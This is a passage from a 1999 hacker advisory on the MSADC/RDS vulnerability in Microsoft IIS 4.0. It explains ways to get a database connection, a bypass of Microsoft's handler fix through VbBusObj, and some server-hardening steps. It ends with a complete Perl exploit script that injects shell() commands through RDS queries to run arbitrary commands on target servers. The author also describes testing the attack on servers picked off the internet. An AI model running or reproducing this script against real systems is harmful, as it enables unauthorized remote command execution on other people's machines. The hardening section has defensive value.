But wait....all is not lost....


It seems when you do a 'typical' or better install with Option Pack 4,
a particular .mdb is installed...namely the btcustmr.mdb which is
installed to %systemroot%\help\iis\htm\tutorial\. Microsoft saves the
day! They're just so damn efficient at helping us hack their own
product...


To get IIS 4.0 you practically need to install Option Pack 4, which
will also then install MDAC 1.5--this is good. Let's just hope they
didn't pick the 'minimal' install... The last catch is that we need to
figure out what %systemroot%. On the majority of the systems it will
probably be c:\winnt, d:\winnt, e:\winnt, or f:\winnt (don't laugh, mine
is f:). I guess some wacko might do \win, \windows, \nt, and if you
upgrade it may be \winnt351 or \winnt35. Well, we can do a little 'brute
force' on all those combinations until one works. Oh, and no, you can't
do "dbq=%systemroot%\help\iis\htm\tutorial\btcustmr.mdb"...the SQL driver
pukes.


So that's my guess! Mr. Gonzalez is using a connection string similar to


"driver={Microsoft Access Driver (*.mdb)};
dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;"



with a query that contains one of the pipe-VBA-shell commands. Now, I
think this technically meets all the known points of the exploit--the only
fuzzy one is where Greg mentions "no need of an *active* database". Now,
I may be reading into it, but btcustmr.mdb is hardly active. It's a
totally unused .mdb sitting in a directory most people probably didn't
know existed.


Just to double check, I did a quick little test...and six of the ten
servers I picked off the Internet were susceptible to this method. That'd
a tad better than Greg's 50%, but I had a small population sample, so I'll
give him the benefit of the doubt.


Now, I obviously could be wrong. Maybe Greg found a way to create the
.mdb, or some other way where he doesn't need to rely on the existence of
btcustmr.mdb. I'm not claiming to be a SQL/database wiz--actually, I hate
database applications. Period. They're gross. But I put up with it for
the better good of the Internet. :) But yes, I could be wrong, and I'm
willing to admit it.


Let me also mention the contenders. They were contenders, but
definitely did not make the final round because as much as the 'look' and
'smelled' exploitable, I couldn't get them to crack:


1. Data Shape Provider. This already has hooks into the VBA
interpreter ( you can put VBA commands in the CALC() function--except it
lacks shell()), and is a primary suspect in my eyes. The bonus is that
you do *not* need any database files to use this. Well, barring the fact
that I really don't know what I'm doing, I played around with it trying to
feed some pipe-VBA-shells to it and whatnot, but couldn't get anything
interesting to happen. Now, this is installed by default, has VBA hooks
already, doesn't need a database, etc. I say this fits the description
more that the btcustmr.mdb thing. And it's just all together 'cooler'.


2. Index Server Provider. Now, not all places use Index Server, so I
highly doubted this was the route, but it is a contender. Again, you
don't need a database file, so that's a bonus. I tried the usual
pipe-VBA-shell commands, but no go either.


If I really had to choose, I'd say the exploit was in the Data Shape
Provider (which Microsoft also warned of in the advisory). But since I
couldn't get it to give me love, I went with btcustmr.mdb.





- 4 - Bonus Aspects of My Script


So, yes, I could be wrong. But I figure why not just feature pack this
script to *really* kick some ass? Well, so, I wasted a few brains cells
(the things I do for you people...jeez) and thought of some good things to
toss into the code. I figure hey, might as well make this a useful tool!


The first one is pretty obvious. There are many applications on the
market, that would be used on a server, that would make/require a DSN.
For instance Cold Fusion creates a few DSNs, as does iHTML. Some of the
sample apps that come with IIS create DSNs as well, and the MDAC makes a
few too. All these potential DSNs. Remember, it only takes one DSN to
work. So if we wanted to, we could scan to see if any of a number of
default DSNs exist, and if they do, use them.


An extension of this would be user created DSNs. Again, all we need is
the DSN name, so we can scan for what are 'psychologically' common DSN
names. For instance test, web, data, database, www, db, and sql are
common type DSN names. Basically, if you supply a dictionary file of DSN
names you want to use, the script will sit there and brute force, a la a
remote password cracker on the DSN names.


Of course, we'd need DSNs with the Access Driver. But what's nice
is that if we connect to a valid DSN with an invalid SQL query, we'll get
back the name of the driver in the error message. So it's a nice way to
check.


Then we can also do an inverse type thing--instead of looking for
common DSNs to connect to, we can look for common .mdbs to connect to.
For instance MS Cert Server, DHCP, and WINS all use .mdbs, as well as
particular sample scripts, SDKs, etc. We can just try to connect to them
directly. If we find one, rather than dealing with the table information
within the .mdb, we can just CREATE TABLE on it first, and then use
the table we just created. Very simple.


Another interesting feature is dumping the root scope paths from Index
Server. Basically it's a query of "Select paths from scope()". This is
useful because it can provide us with useful directory information...since
one of the tricky problems is determining location of html files and
systemroot (although they're most likely guessable, that's not always the
case). So I tossed this in for kicks, although it doesn't run 'inline'
with the actually DSN/.mdb checks. You invoke this functionality
separately.


The last extra functionality, but the easiest of them all, is to see if
/scripts/tools/makedsn.exe exists on the webserver. If it does, we can
make a DSN and define the .mdb file to use, and then use it right
away. In my particular script I make a DSN named 'wicca'. (Greetings to
Simple Nomad! I wish you could have been around at DefCon. Next time.)


So, wow. Lots of ways to get a database connection. My RDS script
tries them in the following order, continuing until successful:


- try raw driver connect to btcustmr.mdb
- try to create a DSN with /scripts/tools/makedsn.exe
- look for common DSNs
- look for common .mdbs
- try 'dictionary' attack on user DSNs


And separately you can query Index Server to get the paths information
(Warning: this could be a lot of information! The script automatically
sorts out common directories).


----- Campaign solicitation --------------------------------------------


XOR!! The unofficial AES candidate!


There are many reasons why you should support XOR:
1. It's mad fast!
2. It can be implemented in very little code
3. It will run with decent performance even on the meekest of
Casio watches
4. The ciphertext doesn't look like the plaintext--this is good.
5. Stream, block, chained, unchained, XOR does it all!
6. So many companies already use it as their encryption algo of choice!


So join the 'AES XOR y2k == 8w8' campaign today!


------------------------------------------------------------------------


One interesting feature that's almost necessary is a 'resume' mode.
Imagine you just scanned a webserver, spending the last 5 minutes trying
all the combinations of valid default .mdbs, valid DSNs, etc. Finally it
cracks and you get one, and you run your command. Well, what if you want
to run another command? Do you have to go through that rigmarole again?
Well, not with my script. :) When you make a successful connection, it
writes out a file called 'rds.save'. Then, you can just use the 'resume'
switch (-R), with no other options. It will read in rds.save, and let you
run a command against the successful connection again right away.





- 5 - More Bonus Features


Well so far, I haven't really provided anything really original. I'm
all for originality. So I racked my brain. I poured through all of
Microsoft's ADO/OLEDB/RDS/ODBC documentation. I read their advisory. I
disassembled billions of .dlls. And then inspiration struck.


You see, MDAC 1.5 installs *three* objects by default.
RDSServer.DataFactory, which we've discussed before. AdvancedDataFactory,
which is really an alias to RDSServer.DataFactory. But there's also one
called VbBusObj.VbBusObjCls. This is really an example of a middle-tier
business object of the possible three-tier RDS model. It implements four
functions: Test, GetMachineName, ExecuteSQL, and GetRecordSet.


Test does nothing for us. GetMachineName is fun just because it
returns the machines NetBIOS name, which is useful in m

  
any cases. So I
tossed it in. You invoke it with the -N switch.


Now ExecuteSQL and GetRecordSet do basically the same thing, run a SQL
query. The difference is ExecuteSQL just returns how many records we
affected, while GetRecordSet returns the records as actual data. I chose
to use GetRecordSet because it integrated better with the rest of the
code, since it's return was strikingly familiar to the output from the
RDSServer.DataFactory control. This is not a big deal, other than a
bandwidth issue, but we're not talking more than a few K of data here
anyway.


I know you're probably thinking 'uh, so what. There's another way to
do the same thing. I mean the GetMachineName thing is cool, but not all
that much special'. Well, no. Your wrong. And let me tell you why.


Starting with MDAC 2.0 you can define custom handlers. Basically,
rather than RDSServer.DataFactory going straight to the database driver,
it takes a side trip through a handler. This is the fix Microsoft
mentioned in their security advisory at


http://www.microsoft.com/security/bulletins/ms99-025.asp


They recommend you switch the following registry entry


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo]
"handlerRequired"=dword:00000001
"DefaultHandler"="MSDFMAP.Handler"


which tells RDSServer.DataFactory that RDS *must* use a handler, and that
the default handler is MSDFMAP.Handler. Then you can use msdfmap.ini to
specify options for denying certain connections, etc.


Microsoft even supplies HANDSAFE.EXE, which auto-extracts to a .reg
file that sets the above registry keys, plus a list of safe handlers. So
if you need RDS, the preferred upgrade route from MDAC 1.5 is to install
the latest MDAC 2.x, and then run HANDSAFE.EXE to make sure to limit
outside queries by using handlers, which are controlled.


Well, all this fun handler crud is implemented in
RDSServer.DataFactory. So we're kinda screwed when we run
RDSServer.DataFactory.Query (as we should be, as this is the fix). Well,
guess what. VbBusObj.VbBusObjCls doesn't care about handlers. We just
effectively bypassed the handler thing. Wait, let me spell it out for
you:


THE MICROSOFT CUSTOM HANDLER FIX DOES NOT PREVENT THIS. WE
CAN STILL RUN QUERIES. HANDSAFE.EXE/CUSTOM HANDLERS (THE
RECOMMENDED MICROSOFT FIX) DOES NOT PROTECT AGAINST THIS.


Wow. So we just use VbBusObj.VbBusObjCls instead of
RDSServer.DataFactory. Simple enough. I think this is definately a
worthwhile feature. You can cause the script to use VbBusObj by
specifying the -V option. But I will admit: VbBusObj.VbBusObjCls is not
always installed. So this is not always the case. But it's a case,
none-the-less.


NOTE: When using VbBusObj, I suggest you use -N *FIRST*. If you get a
valid NetBIOS name back, VbBusObj exists. If you use -V without verifying
VbBusObj exists, and in fact it doesn't exist, the script/connection will
HANG! So just humor me first and use -N first to see if -V is a valid
option. I could have automated it, but then again, why should I allow you
to be lazy?


Now Microsoft does make some other mentions of just disabling RDS all
together. While this will work, unfortunately, RDS exists for a reason,
and many people are using it legitimately. That means there are people
who can't disable it because they use it. So what to do?





- 6 - How to Secure Your Server


Ok, I've talked so much on how to break this stuff. How about helping
fix the matter? Well sure. Basically we have to situations: those who
need RDS, and those who don't. I shall address both.


Those who need RDS: I agree with Microsoft--custom handlers are the
way to go. Unfortunately, there's that pesky VbBusObj to deal with. This
is actually not that hard. You need to delete the VbBusObj references.
Simply delete the following registry key


HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/
W3SVC/Parameters/ADCLaunch/VbBusObj.VbBusObjCls


(line broken for clarity)


For peace of mind you can also delete vbbusobj.dll, which is installed at
(pending root drives)


c:\program files\common files\system\msadc\samples\selector\
middle_tier\vbbusobj\vbbusobj.dll


(again, line broken for clarity)


That should be it. Now, you'll need to read about custom handler
creation, and cooperate with the DBAs at your location to come up with a
suitable, yet secure handler definition.


Those who don't need RDS: I would still upgrade your MDAC and run
HANDSAFE.EXE just in case. But you can basically prevent people from
using RDS remotely by removing the /msadc/ virtual root. You can do this
in MMC or via the IIS Administration HTML interface.


For everybody: While we're digging around IIS, let's do a little
cleaning up, shall we? Let's start off with ODBC. Open up Control Panel,
and go into ODBC. Look at the DSNs defined under User, System, and File.
You should delete any DSNs you do not use, especially sample/default DSNs,
such as 'pubs', 'advworks', 'adctest', etc. You should fully research the
need for any particular DSN you use. And personally, I would suggest when
in doubt, record the configuration information and then remove it.
Recording the information is important in case you have to put it back.


Now, under ODBC Drivers, again, you should remove any drivers you do
not use. Having 'SQL Server' means people could potentially proxy off
your machine to another SQL server. The 'Microsoft Text Driver' should
definately be deleted. The more you delete, the safer you are.


Let's now pop over to IIS. Pull up MMC or the adminstrative
web interface. Follow down the tree branches until you get to Default Web
Site (or whatever your website might be). Examine which virtual
directories you have mounted into your site. You should research the uses
of these as well, deleting when in doubt (record the 'Properties'
information first just in case). Virtual directories I suggest deleting
(if you have them):


IISSamples This are the sample pages shipped with IIS--and
contain a few bugs
IISHelp you can remove this. It's HTML help reference.
IISadmpwd this is an IIS util for users to change their
passwords via IIS. Unfortunately it contains a
few bugs. I suggest you remove it.
Msadc mentioned above, remove if you don't need RDS

If you have Cold Fusion installed, you'll also have CFdocs. I suggest you
remove it, as it contains a horde of exploitable sample scripts.


On to the last check, which are physical files. I'm going to assume
the web directory is c:\inetpub. Adjust accordingly. I suggest checking
the following:


-- c:\inetpub\scripts\tools
This contains by default a few tools to make DSNs. I suggest you
delete everything in this directory. Or, if you're worried about
deleting it, than MOVE it out of the directory, and into one
that's *NOT* available through your web server


-- c:\inetpub\scripts\samples
Samples. Need I say more? Delete or move them. Contians scripts
that are known to be exploitable (see my ODBC advisory)


-- c:\inetpub\scripts\iisadmin
This is the IIS 3.0 administration interface. IIS 4.0 uses
something different. Delete or move everything. Again, contains
exploitable sample scripts.


-- c:\inetpub\iissamples\
This contains the ExAir sample site, typically the SDK, and other
fun goodies. But they're samples. Delete or move the whole
directory. Contains exploitable sample scripts.


That should lock you down a lot more than the average IIS install.
Unfortunately every location is different, so I can't guarantee you're
secure now. But you're 'less unsecure'. :)





- 7 - Command Line Options


To run the program, just save this whole advisory to a file, such as
msadc.pl. Then run "perl -x msadc.pl". Perl is smart and will figure out
how to run the script at the end. No need to cut and paste. :)


Ok, the command switches are as follows:


-h <ip or domain> this is the host to scan. You MUST either
use either -h or -R.


-d <value 0-?> this is the delay between connections.
Value is in number of seconds. I added
this because hammering the RDS components
caused the server to occasionally stop
responding :) Defaults to 1. Use -d 0
to disable.


-V Use VbBusObj instead of DataFactory to
run the queries. NOTE: please read the -N
information below as to suggestions for
checking if VbBusObj exists. VbBusObj
does not give good error reporting;
therefore it is quite possible to have
false positives (and false negatives).
Consider VbBusObj support 3 stages before
beta. Don't say I didn't warn you.


-v verbose. This will print the ODBC error
information. Really only for
troubleshooting purposes.


-e external dictionary file to use on step
5--the 'DSN dictionary guess' stage. The
file should just be plaintext, one DSN
name per line file with all the DSN names
you want to try. Quite honestly a normal
dictionary file won't do you much good.
You can probably do pretty damn well with
a few dozen or two good ones, like 'www',
'data', 'database', 'sql', etc.


-R resume. You can still specify -v or -d
with -R. This will cause the script to
read in rds.save and execute the command
on the last valid connection.


-N Use VbBusObj to try to get the machine's
NetBIOS name. It may return no name
if the VbBusObj is unavailable. I suggest
you use -N to see if VbBusObj exists (a
NetBIOS name will be returned if so)
before you use -V.


-X perform an Index Server table dump instead.
None of the other switches really apply
here, other than -v (although -d still
works, there's no need to slow down one
query). This dumps the root paths from
Index Server, which can be rather lengthy.
I suggest you pipe the output into a file.
Also, if there is a lot of return
information, this command may take a while
to complete. Be patient. And I don't
suggest you use this command more than
once a minute...it caused my P200 w/
128 RAM to stop answering requests, and
in general borked inetinfo.exe. If you do
decide to CONTROL-C during the middle of the
data download the script will save all
received data into a file called 'raw.out',
so you don't loose everything you've
already received. NOTE: this is the raw
data, which is in Unicode.



NOTE ON SUCCESS: The script reports 'Success!' when it has issued a valid
SQL statement. 'Success!' does *NOT* mean that your command worked. If
they have MDAC 2.1+ shell commands are worthless, so the script will
report 'Success!' (it went through) but your command didn't run (MDAC 2.1
didn't interpret it). There's no return indication to know whether your
command worked or not. As with the ODBC commands, you're flying blind.




- 8 - Random Q & A


- "This or that function of the script is broken"
-- Well, it wasn't broken when I used it, so you must of broke it.
No, seriously. I've tested it on Linux, L0pht tested it on
Solaris, and Vacuum tested it on NT (using Perl 5.005-03 for
Windows). They worked for us. I've coded some various checks
for errors, but nothing robust. But I know it worked for me. :)


- "Why don't you code this in C?"
-- Because I've been programming C/C++ for 8 years. I'm tired of it.
I've been coding perl for 3, so it's new and fresh, and I'm just
now starting to do interesting stuff. Plus the code is portable
this way. Come on, where else can you have a piece of code that
does network/socket level stuff that runs on NT, Linux, and Solaris
with no changes??!?


- "Or you going to port this to C?"
-- It wouldn't be that hard at all, but wasn't planning on it. You have
something against perl?


- "What's the F in Russell F. Prigogine stand for?"
-- Fabio. Fear the geese.


- "Why do you act like this is a joke?"
-- Because I don't get paid for doing this, I don't get donations, and I
don't get any sexual gratification from this what-so-ever. I
do this because I *like* to, because it's *FUN*--so damn it,
I'm having fun!


- "I don't get some of the jokes in the paper. Like what's FMP?"
-- If you have to ask, you wouldn't understand. This advisory is
teeming with inside jokes. RFP, FMP.


- "Who picked your switches? v/V, R, X, N...d,v,h,e...they make no sense."
-- They do to me.


- "Where can I find the Internet's largest archive of hacked websites?"
-- Oh, wonderful that you should ask. www.attrition.org is just the
place. Say 'hi' to Jericho for me when you get there.




- 9 - Signoff


Ok, I've been coding the script, reading MS database propaganda (did I
mention yet I hate database stuff?), and writing this damn advisory for a
collective of 30 hours. About time I stop and never think about it again.
:)


So you have my best shot at the RDS exploit, even though I think there
may be something pretty nifty hiding in the Data Shape Provider (or maybe
Index Server). We'll just have to wait and see if/when Greg and Russ
finally decide they can share their toys.


Remember, I spent 2 days typing all this in an attempt to teach people
something, rather than to just release the vanilla exploit. So if you
want to label me irresponsible, well, I suppose I could have been more so.
Moreover, I support eEye in what they did 100%. Russ says "there are
numerous unwritten rules when it comes to security disclosures"
. Rules?
Unwritten? Well, maybe eEye was unaware of these rules, since they're not
written down.


Future updates to this advisory and exploit code will be posted to


www.technotronic.com/rfp/


Well, it's been fun. Until the next release (which may be sooner than
you think ;)


- rain forest puppy / R. F. Prigogine -


- ADM / Wiretrip -


- rfp@wiretrip.net -




*** SPECIAL THANKS once again to Mudge and Weld from
www.l0pht.com for helping me out on the preliminary
assessment, and Mike Dinowitz from www.houseoffusion.com
and Vacuum from www.technotronic.com for creative input.



Time is creation. The future is just not there.


Kitetoa, did you hack my ham sandwich!?!?





- 10 - The Code!!!!


Again, to run this, save this advisory to a file (for instance
msadc.txt) and then run 'perl -x file' (ie perl -x msadc.txt).


#!perl
#
# MSADC/RDS 'usage' (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!


use Socket; use Getopt::Std;
getopts("e:vd:h:XRVN", \%args);


print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";


if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5


Or a -R will resume a command session


~; exit;}


$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }
if (defined $args{N}) {&get_name; exit;}


print "Please type the NT commandline you want to run (cmd /c assumed):\n"
. "cmd /c ";
$in=<STDIN>; chomp $in;
$command="cmd /c " . $in ;


if (defined $args{R}) {&load; exit;}


print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;


print "\nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>\n" : print "<<fail>>\n";


print "\nStep 3: Trying known DSNs...";
&known_dsn;


print "\nStep 4: Trying known .mdbs...";
&known_mdb;


if (defined $args{e}){
print "\nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 5 skipped.\n\n"; }


print "Sorry Charley...maybe next time?\n";
exit;


##############################################################################


sub sendraw { # ripped and modded from whisker
sleep($delay); # it's a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}


##############################################################################


sub make_header { # make the HTTP request
my $which, $msadc; # yeah, this is WAY redundant. I'll fix it later


if (defined $args{V}){
$msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetRecordset HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive


ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=2


--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen


EOT
; } else {
$msadc=<<EOT
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive


ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3


--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen


EOT
;}
$msadc=~s/\n/\r\n/g;
return $msadc;}


##############################################################################


sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;


if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City=" . make_shell();
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}


elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}


elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C=" . make_shell();
$dsn="$p1";}


elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}


elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}


$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}


##############################################################################


sub make_shell { # this makes the shell() statement
return "'|shell(\"$command\")|'";}


##############################################################################


sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}


##############################################################################


sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}


##############################################################################


sub make_dsn { # this makes a DSN for us
my @drives=("c","d","e","f");
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}


##############################################################################


sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}


##############################################################################


sub try_btcustmr {
my @drives=("c","d","e","f");
my @dirs=("winnt","winnt35","winnt351","win","windows");


foreach $dir (@dirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;


my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}


##############################################################################


sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}


##############################################################################


sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}


##############################################################################


sub save {
my ($p1, $p2, $p3, $p4)=@_;
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
close OUT;}


##############################################################################


sub load {
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
$ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";


$p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g;


if($p[1]==1) {
$reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
if (rdo_success(@results)){print "Success!\n";}
else { print "failed\n"; verbose(odbc_error(@results));}}


elsif ($p[1]==3){
if(run_query("$p[3]")){
print "Success!\n";} else { print "failed\n"; }}


elsif ($p[1]==4){
if(run_query($drvst . "$p[3]")){
print "Success!\n"; } else { print "failed\n"; }}
exit;}


##############################################################################


sub create_table {
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}


##############################################################################


sub known_dsn {
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");


foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successful\n" if (!defined $args{V});
if(run_query("DSN=$dSn")){
print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }}} print "\n";}


##############################################################################


sub is_access {
my ($in)=@_;
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}


##############################################################################


sub run_query {
my ($in)=@_;
$reqlen=length( make_req(3,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}


##############################################################################


sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";


# this is sparse, because I don't know of many
my @sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%


my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \


foreach $drive (@drives) {
foreach $dir (@dirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n" if
(!defined $args{V});
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit;
}}}}}


foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv . $drive . $dir . $mdb)){
print "\n" . $drive . $dir . $mdb . " successful\n" if
(!defined {V});
if(run_query($drv . $drive . ":" . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit;
}}}}
}


##############################################################################


sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}


##############################################################################


sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successful\n" if(!defined $args{V});
if(run_query("DSN=$dSn")){
print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }}}
